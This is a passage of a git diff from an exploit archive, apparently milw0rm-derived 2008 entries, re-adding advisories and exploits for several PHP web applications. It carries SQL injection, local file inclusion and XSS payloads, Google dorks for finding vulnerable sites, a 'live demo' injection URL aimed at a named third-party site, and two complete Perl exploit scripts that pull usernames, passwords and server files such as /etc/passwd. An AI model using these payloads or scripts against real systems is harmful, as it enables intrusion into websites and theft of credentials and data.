+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
+#
+# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
+# Vulnerable Version: 1.1
+# 
+###########################################################
+#
+# d0rk:Powered By Vastal I-Tech's phpVID. 
+# 
+# 
+###########################################################
+ 
+     Vulnerabilities
+
+     Blind SQL Injection in "groups.php" in the "cat" parameter.
+     Cross Site Scripting in "search_results.php"
+  
+     
+     POC:  
+	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
+	http://www.site.com/search_results.php?query=[XSS] 
+
+     
+     Live Demo: 
+	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
+	http://www.phpvid.com/search_results.php?query=
+
+
+###########################################################
+#
+#  Bug discovered : 10 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6423.txt b/platforms/php/webapps/6423.txt
index 1ab29cb9b..2e2050169 100755
--- a/platforms/php/webapps/6423.txt
+++ b/platforms/php/webapps/6423.txt
@@ -1,43 +1,43 @@
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-        +                                                                    +
-        +    Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability    +
-        +                                                                    +
-        +                   Discovered by Cru3l.b0y                          +
-        +                                                                    +
-        +                     WwW.DeltaHacking.Net                           +
-        +                                                                    +
-        +                                                                    +
-        +                                                                    +
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-
-		
-AUTHOR : Cru3l.b0y
-DATE   : 10 sep 2008
-SITE   : WwW.DeltaHacking.Net
-
-
-#####################################################
-APPLICATION : Zanfi CMS lite / Jaw Portal free
-DOWNLOAD    : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar
-VENDOR      : http://www.zanfi.nl/
-Dork        : Powered by: Zanfi Solutions
-#####################################################
-
-
-[+] SQL     : DBpAGE&pageid=-1'+union+select+version(),user()/*
-[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL]
-
-
-
-
-################################################################
-# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net #
-################################################################
-
-
-WebSite: WwW.DeltaHacking.Net  &  WwW.w3bsecurity.iR
-
-Contact: Cru3l.b0y[at]gmail.com
-
-# milw0rm.com [2008-09-10]
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        +                                                                    +
+        +    Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability    +
+        +                                                                    +
+        +                   Discovered by Cru3l.b0y                          +
+        +                                                                    +
+        +                     WwW.DeltaHacking.Net                           +
+        +                                                                    +
+        +                                                                    +
+        +                                                                    +
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+		
+AUTHOR : Cru3l.b0y
+DATE   : 10 sep 2008
+SITE   : WwW.DeltaHacking.Net
+
+
+#####################################################
+APPLICATION : Zanfi CMS lite / Jaw Portal free
+DOWNLOAD    : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar
+VENDOR      : http://www.zanfi.nl/
+Dork        : Powered by: Zanfi Solutions
+#####################################################
+
+
+[+] SQL     : DBpAGE&pageid=-1'+union+select+version(),user()/*
+[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL]
+
+
+
+
+################################################################
+# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net #
+################################################################
+
+
+WebSite: WwW.DeltaHacking.Net  &  WwW.w3bsecurity.iR
+
+Contact: Cru3l.b0y[at]gmail.com
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6425.txt b/platforms/php/webapps/6425.txt
index aff99bc88..49ffd6bd4 100755
--- a/platforms/php/webapps/6425.txt
+++ b/platforms/php/webapps/6425.txt
@@ -1,51 +1,51 @@
-----------------------------------------------------------------
-
-Script : PhpWebGallery 1.3.4
-
-Type : Multiple Vulnerabilities (XSS/LFI)
-
-Rist : High
-
-Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
-
-----------------------------------------------------------------
-
-Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
-
-----------------------------------------------------------------
-
-Discovered by : Khashayar Fereidani Or Dr.Crash
-
-My Official Website : HTTP://FEREIDANI.IR
-
-Team Website : Http://IRCRASH.COM
-
-Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
-
-----------------------------------------------------------------
-
-Local File Inclusion Vulnerabilities :
-
-Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]
-
-Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]
-
-Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]
-
------------------------------------------------------------------
-
-Cross Site Scripting Vulnerabilities :
-
-Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=
-
-Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=
-
-----------------------------------------------------------------
-
-                        Tnx : God
-
-          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
-
-----------------------------------------------------------------
-
-# milw0rm.com [2008-09-11]
+----------------------------------------------------------------
+
+Script : PhpWebGallery 1.3.4
+
+Type : Multiple Vulnerabilities (XSS/LFI)
+
+Rist : High
+
+Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
+
+----------------------------------------------------------------
+
+Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
+
+----------------------------------------------------------------
+
+Discovered by : Khashayar Fereidani Or Dr.Crash
+
+My Official Website : HTTP://FEREIDANI.IR
+
+Team Website : Http://IRCRASH.COM
+
+Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
+
+----------------------------------------------------------------
+
+Local File Inclusion Vulnerabilities :
+
+Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]
+
+Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]
+
+Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]
+
+-----------------------------------------------------------------
+
+Cross Site Scripting Vulnerabilities :
+
+Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=
+
+Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=
+
+----------------------------------------------------------------
+
+                        Tnx : God
+
+          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
+
+----------------------------------------------------------------
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6426.txt b/platforms/php/webapps/6426.txt
index 06eb0457d..e426ad4a2 100755
--- a/platforms/php/webapps/6426.txt
+++ b/platforms/php/webapps/6426.txt
@@ -1,55 +1,55 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)
-#
-# Vendor: http://www.zanfi.nl/autodealerscms.php
-# 
-# Demo: http://autonline.zanfi.nl/
-###########################################################
-#
-# d0rk:Powered by: Zanfi Solutions
-#.  
-# 
-###########################################################
- 
-     Exploit:-
-	http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*
-
-     
-     
-     Live Demo: 
-	http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*
-
-
-###########################################################
-#
-#  Bug discovered : 10 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-11]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)
+#
+# Vendor: http://www.zanfi.nl/autodealerscms.php
+# 
+# Demo: http://autonline.zanfi.nl/
+###########################################################
+#
+# d0rk:Powered by: Zanfi Solutions
+#.  
+# 
+###########################################################
+ 
+     Exploit:-
+	http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*
+
+     
+     
+     Live Demo: 
+	http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*
+
+
+###########################################################
+#
+#  Bug discovered : 10 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6427.txt b/platforms/php/webapps/6427.txt
index 5c33ff239..a0d4dcfce 100755
--- a/platforms/php/webapps/6427.txt
+++ b/platforms/php/webapps/6427.txt
@@ -1,15 +1,15 @@
---==+============================================================================+==--
---==+   Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability          +==--    
---==+============================================================================+==--
-
- [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
- [+] Discovered On: 11 Sep 2008
- [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
-
- [*] Vulnerability:
- 
- [*] LFI
- [+] index.php?p= [File %00]
- [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00
-
-# milw0rm.com [2008-09-11]
+--==+============================================================================+==--
+--==+   Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability          +==--    
+--==+============================================================================+==--
+
+ [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
+ [+] Discovered On: 11 Sep 2008
+ [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
+
+ [*] Vulnerability:
+ 
+ [*] LFI
+ [+] index.php?p= [File %00]
+ [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6428.pl b/platforms/php/webapps/6428.pl
index c7b593854..6f97a43e2 100755
--- a/platforms/php/webapps/6428.pl
+++ b/platforms/php/webapps/6428.pl
@@ -1,205 +1,205 @@
-#!/usr/bin/perl
-#----------------------------------------------------------------
-#
-#Script : Ezphotogallery 2.1
-#
-#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
-#
-#Method : GET
-#
-#Alert : High
-#
-#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
-#
-#----------------------------------------------------------------
-#
-#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
-#
-#My Official Website : HTTP://FEREIDANI.IR
-#
-#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
-#
-#----------------------------------------------------------------
-#
-#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
-#
-#----------------------------------------------------------------
-#
-#Script Download :  http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
-#
-#----------------------------------------------------------------
-#Xss Vulnerabilities :
-#
-#Xss 1 : gallery.php?galleryid=
-#Xss 2 : show.php?imageid=156&size="''>""''
-#Xss 3 : show.php?imageid=
-#
-#----------------------------------------------------------------
-#Login Bypass :
-#
-#Insert in gallery.php
-#
-#User : admin ' or ' 1=1
-#Password : Dr.Crash
-#
-#----------------------------------------------------------------
-#Sql Injection :
-#
-#Injection 1 : show.php?imageid=
-#----------------------------------------------------------------
-#
-#                        Tnx : God
-#
-#                     HTTP://IRCRASH.COM
-#
-#----------------------------------------------------------------
-
-use LWP;
-use HTTP::Request;
-use Getopt::Long;
- 
- 
-$scriptname="Ezphotogallery 2.1";
-
-sub header
-{
-print "
-****************************************************
-* $scriptname
-****************************************************
-*Discovered by : Khashayar Fereidani               *
-*Exploited by : Khashayar Fereidani                *
-*My Official Website : http://fereidani.ir         *
-****************************************************";
-}
- 
-sub usage
-{
-  print "
-* Usage : perl $0 http://Example/
-****************************************************
-";
-}                                                                                  
- 
-
-$url = ($ARGV[0]);
-
-if(!$url)
-{
-header();
-usage();
-exit;
-}
-if($url !~ /\//){$url = $url."/";}
-if($url !~ /http:\/\//){$url = "http://".$url;}
-sub xpl1()
-{
-#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
-$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*";
-$requestpage = $url.$vul;
-
- 
-my $req  = HTTP::Request->new("POST",$requestpage);
-$ua = LWP::UserAgent->new;
-$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
-#$req->referer($url);
-$req->referer("IRCRASH.COM");
-$req->content_type('application/x-www-form-urlencoded');
-$req->header("content-length" => $contlen);
-$req->content($poststring);
- 
-$response = $ua->request($req);
-$content = $response->content;
-$header = $response->headers_as_string();
- 
-@name = split(/Login:/,$content);
-$name = @name[1];
-@name = split(//,$name);
-$name = @name[0];
- 
-@password = split(/Password:/,$content);
-$password = @password[1];
-@password = split(//,$password);
-$password = @password[0];
-
-if(!$name && !$password)
-{
-print "\n\n";
-print "!Exploit failed ! :(\n\n";
-exit;
-}
- 
-print "\n Username: ".$name."\n\n";
-print " Password: " .$password."\n\n";
-
- 
-}
- 
-
-#XPL2
-
-sub xpl2()
-{
-print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
-print "\n Enter File Address :";
-$fil3 = ;
-
-$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*";
-$requestpage = $url.$vul;
- 
-my $req  = HTTP::Request->new("POST",$requestpage);
-$ua = LWP::UserAgent->new;
-$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
-#$req->referer($url);
-$req->referer("IRCRASH.COM");
-$req->content_type('application/x-www-form-urlencoded');
-$req->header("content-length" => $contlen);
-$req->content($poststring);
- 
-$response = $ua->request($req);
-$content = $response->content;
-$header = $response->headers_as_string();
-
- 
-@name = split(/Login:/,$content);
-$name = @name[1];
-@name = split(//,$name);
-$name = @name[0];
-
-
-if(!$name && !$password)
-{
-print "\n\n";
-print "!Exploit failed ! :(\n\n";
-exit;
-}
- 
-open (FILE, ">".source.".txt");
-print FILE $name;
-close (FILE);
-print " File Save In source.txt\n";
-print "";
- 
-}
-
-#XPL2 END
-#Starting;
-print "
-****************************************************
-* $scriptname
-****************************************************
-*Discovered by : Khashayar Fereidani               *
-*Exploited by : Khashayar Fereidani                *
-*My Official Website : http://fereidani.ir         *
-****************************************************
-* Mod Options :                                    *
-* Mod 1 : Find Script username and password        *
-* Mod 2 : File Disclosure mode                     *
-****************************************************";
-print "\n \n Enter Mod : ";
-$mod=;
-if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
-if ($mod=="1") { xpl1(); };
-if ($mod=="2") { xpl2(); };
-
-# milw0rm.com [2008-09-11]
+#!/usr/bin/perl
+#----------------------------------------------------------------
+#
+#Script : Ezphotogallery 2.1
+#
+#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
+#
+#Method : GET
+#
+#Alert : High
+#
+#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
+#
+#----------------------------------------------------------------
+#
+#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
+#
+#My Official Website : HTTP://FEREIDANI.IR
+#
+#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
+#
+#----------------------------------------------------------------
+#
+#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
+#
+#----------------------------------------------------------------
+#
+#Script Download :  http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
+#
+#----------------------------------------------------------------
+#Xss Vulnerabilities :
+#
+#Xss 1 : gallery.php?galleryid=
+#Xss 2 : show.php?imageid=156&size="''>""''
+#Xss 3 : show.php?imageid=
+#
+#----------------------------------------------------------------
+#Login Bypass :
+#
+#Insert in gallery.php
+#
+#User : admin ' or ' 1=1
+#Password : Dr.Crash
+#
+#----------------------------------------------------------------
+#Sql Injection :
+#
+#Injection 1 : show.php?imageid=
+#----------------------------------------------------------------
+#
+#                        Tnx : God
+#
+#                     HTTP://IRCRASH.COM
+#
+#----------------------------------------------------------------
+
+use LWP;
+use HTTP::Request;
+use Getopt::Long;
+ 
+ 
+$scriptname="Ezphotogallery 2.1";
+
+sub header
+{
+print "
+****************************************************
+* $scriptname
+****************************************************
+*Discovered by : Khashayar Fereidani               *
+*Exploited by : Khashayar Fereidani                *
+*My Official Website : http://fereidani.ir         *
+****************************************************";
+}
+ 
+sub usage
+{
+  print "
+* Usage : perl $0 http://Example/
+****************************************************
+";
+}                                                                                  
+ 
+
+$url = ($ARGV[0]);
+
+if(!$url)
+{
+header();
+usage();
+exit;
+}
+if($url !~ /\//){$url = $url."/";}
+if($url !~ /http:\/\//){$url = "http://".$url;}
+sub xpl1()
+{
+#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
+$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*";
+$requestpage = $url.$vul;
+
+ 
+my $req  = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+ 
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+ 
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(//,$name);
+$name = @name[0];
+ 
+@password = split(/Password:/,$content);
+$password = @password[1];
+@password = split(//,$password);
+$password = @password[0];
+
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+ 
+print "\n Username: ".$name."\n\n";
+print " Password: " .$password."\n\n";
+
+ 
+}
+ 
+
+#XPL2
+
+sub xpl2()
+{
+print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
+print "\n Enter File Address :";
+$fil3 = ;
+
+$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*";
+$requestpage = $url.$vul;
+ 
+my $req  = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+ 
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+
+ 
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(//,$name);
+$name = @name[0];
+
+
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+ 
+open (FILE, ">".source.".txt");
+print FILE $name;
+close (FILE);
+print " File Save In source.txt\n";
+print "";
+ 
+}
+
+#XPL2 END
+#Starting;
+print "
+****************************************************
+* $scriptname
+****************************************************
+*Discovered by : Khashayar Fereidani               *
+*Exploited by : Khashayar Fereidani                *
+*My Official Website : http://fereidani.ir         *
+****************************************************
+* Mod Options :                                    *
+* Mod 1 : Find Script username and password        *
+* Mod 2 : File Disclosure mode                     *
+****************************************************";
+print "\n \n Enter Mod : ";
+$mod=;
+if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
+if ($mod=="1") { xpl1(); };
+if ($mod=="2") { xpl2(); };
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6430.txt b/platforms/php/webapps/6430.txt
index 1ea954add..209299d8c 100755
--- a/platforms/php/webapps/6430.txt
+++ b/platforms/php/webapps/6430.txt
@@ -1,23 +1,23 @@
-############################################################################################################
-[+] D-iscussion Board 3.01 Local File Inclusion
-[+] Discovered By SirGod 
-[+] MorTal TeaM                     
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke                      
-############################################################################################################
-
-Download : http://dino.shiftedphase.com/comp/downloads/forum.zip
-
-[+] Local File Inclusion
-
-
-   PoC :
- 
-     http://[target]/[path]/general/index.php?topic=[LocalFile]%00
-
-   Example :
-
-     http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00
-
-############################################################################################################
-
-# milw0rm.com [2008-09-11]
+############################################################################################################
+[+] D-iscussion Board 3.01 Local File Inclusion
+[+] Discovered By SirGod 
+[+] MorTal TeaM                     
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke                      
+############################################################################################################
+
+Download : http://dino.shiftedphase.com/comp/downloads/forum.zip
+
+[+] Local File Inclusion
+
+
+   PoC :
+ 
+     http://[target]/[path]/general/index.php?topic=[LocalFile]%00
+
+   Example :
+
+     http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00
+
+############################################################################################################
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6431.pl b/platforms/php/webapps/6431.pl
index 1e53c48ee..a8b79301a 100755
--- a/platforms/php/webapps/6431.pl
+++ b/platforms/php/webapps/6431.pl
@@ -1,184 +1,184 @@
-#!/usr/bin/perl
-#----------------------------------------------------------------
-#
-#Script : PhsBlog v0.2
-#
-#Type : Bypass Sql injection Filtering Exploit
-#
-#Method : GET
-#
-#Risk : High
-#
-#----------------------------------------------------------------
-#
-#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
-#
-#My Official Website : HTTP://FEREIDANI.IR
-#
-#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
-#
-#----------------------------------------------------------------
-#
-#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
-#
-#----------------------------------------------------------------
-#
-#Script Download :  http://www.phsdev.com/downloads/phsblog_current.zip
-#
-#----------------------------------------------------------------
-#
-#                        Tnx : God
-#
-#                     HTTP://IRCRASH.COM
-#
-#----------------------------------------------------------------
-
-use LWP;
-use HTTP::Request;
-use Getopt::Long;
- 
- 
-$scriptname="PhsBlog v0.2";
-
-sub header
-{
-print "
-****************************************************
-* $scriptname
-****************************************************
-*Discovered by : Khashayar Fereidani               *
-*Exploited by : Khashayar Fereidani                *
-*My Official Website : http://fereidani.ir         *
-****************************************************";
-}
- 
-sub usage
-{
-  print "
-* Usage : perl $0 http://Example/
-****************************************************
-";
-}                                                                                  
- 
-
-$url = ($ARGV[0]);
-
-if(!$url)
-{
-header();
-usage();
-exit;
-}
-if($url !~ /\//){$url = $url."/";}
-if($url !~ /http:\/\//){$url = "http://".$url;}
-sub xpl1()
-{
-#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
-$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*";
-$requestpage = $url.$vul;
-
- 
-my $req  = HTTP::Request->new("POST",$requestpage);
-$ua = LWP::UserAgent->new;
-$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
-#$req->referer($url);
-$req->referer("IRCRASH.COM");
-$req->content_type('application/x-www-form-urlencoded');
-$req->header("content-length" => $contlen);
-$req->content($poststring);
- 
-$response = $ua->request($req);
-$content = $response->content;
-$header = $response->headers_as_string();
- 
-@name = split(/Login:/,$content);
-$name = @name[1];
-@name = split(//,$name);
-$name = @name[0];
- 
-@password = split(/Password:/,$content);
-$password = @password[1];
-@password = split(//,$password);
-$password = @password[0];
-
-if(!$name && !$password)
-{
-print "\n\n";
-print "!Exploit failed ! :(\n\n";
-exit;
-}
- 
-print "\n Username: ".$name."\n\n";
-print " Password: " .$password."\n\n";
-
- 
-}
- 
-
-#XPL2
-
-sub xpl2()
-{
-print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
-print "\n Enter File Address :";
-$fil3 = ;
-#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
-$vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
-$requestpage = $url.$vul;
- 
-my $req  = HTTP::Request->new("POST",$requestpage);
-$ua = LWP::UserAgent->new;
-$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
-#$req->referer($url);
-$req->referer("IRCRASH.COM");
-$req->content_type('application/x-www-form-urlencoded');
-$req->header("content-length" => $contlen);
-$req->content($poststring);
-
-$response = $ua->request($req);
-$content = $response->content;
-$header = $response->headers_as_string();
-
- 
-@name = split(/Login:/,$content);
-$name = @name[1];
-@name = split(//,$name);
-$name = @name[0];
-
-
-if(!$name && !$password)
-{
-print "\n\n";
-print "!Exploit failed ! :(\n\n";
-exit;
-}
- 
-open (FILE, ">".source.".txt");
-print FILE $name;
-close (FILE);
-print " File Save In source.txt\n";
-print "";
- 
-}
-
-#XPL2 END
-#Starting;
-print "
-****************************************************
-* $scriptname
-****************************************************
-*Discovered by : Khashayar Fereidani               *
-*Exploited by : Khashayar Fereidani                *
-*My Official Website : http://fereidani.ir         *
-****************************************************
-* Mod Options :                                    *
-* Mod 1 : Find Script username and password        *
-* Mod 2 : File Disclosure(not work in many servers)*
-****************************************************";
-print "\n \n Enter Mod : ";
-$mod=;
-if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
-if ($mod=="1") { xpl1(); };
-if ($mod=="2") { xpl2(); };
-
-# milw0rm.com [2008-09-11]
+#!/usr/bin/perl
+#----------------------------------------------------------------
+#
+#Script : PhsBlog v0.2
+#
+#Type : Bypass Sql injection Filtering Exploit
+#
+#Method : GET
+#
+#Risk : High
+#
+#----------------------------------------------------------------
+#
+#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
+#
+#My Official Website : HTTP://FEREIDANI.IR
+#
+#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
+#
+#----------------------------------------------------------------
+#
+#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
+#
+#----------------------------------------------------------------
+#
+#Script Download :  http://www.phsdev.com/downloads/phsblog_current.zip
+#
+#----------------------------------------------------------------
+#
+#                        Tnx : God
+#
+#                     HTTP://IRCRASH.COM
+#
+#----------------------------------------------------------------
+
+use LWP;
+use HTTP::Request;
